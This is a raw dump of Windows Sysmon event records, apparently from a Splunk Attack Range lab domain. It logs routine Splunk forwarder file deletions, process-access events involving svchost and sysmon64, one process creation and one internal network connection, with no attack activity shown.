23542300x8000000000000000809747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.479{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0A1F58EC946618E7A5C093133FDA0F,SHA256=D7E3786C8209AEE9E9B5BE00BDBFCD4485CF903815D941B242C91E85C2F4DBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.479{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C266828483F28505887791B7D1B9B859,SHA256=BDD2CAD068D1CC8E0BF2A55514BDD23140538581B1A8E98DC9F83B89944AA5AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:25.479{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02F6E6A8F42BB24DFBD5D85E6945EAC7,SHA256=C38425F6DC59071C6EEFB71FFF9CAC3378B3D24F58A30E52B6EA709CAB2226BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:25.087{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBA1B978D9C1F15DE45A31C26FC677CB,SHA256=206FA4C3FB80B0C6574B7FC1EED114A6220B1A222A8B0E15DB1CA7B7D8C13ECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.682{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0A1F58EC946618E7A5C093133FDA0F,SHA256=D7E3786C8209AEE9E9B5BE00BDBFCD4485CF903815D941B242C91E85C2F4DBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:26.651{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DCBDB0EB7173F5A24C9E253C40E567E,SHA256=76C7CB9D194B3EF113F73C51F9AD6C7DCD9FC6F1A70CF7793E0C478B11A9D526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:26.102{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75B168FC1F286E7742E3E008107CEADB,SHA256=4B66571E9DE72604675636B9AC6B0CA9A4F4B5F43DB4A3AB779EE9EB549B2A7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.355{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.221{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57420-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000809805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.744{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.744{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.744{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.744{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 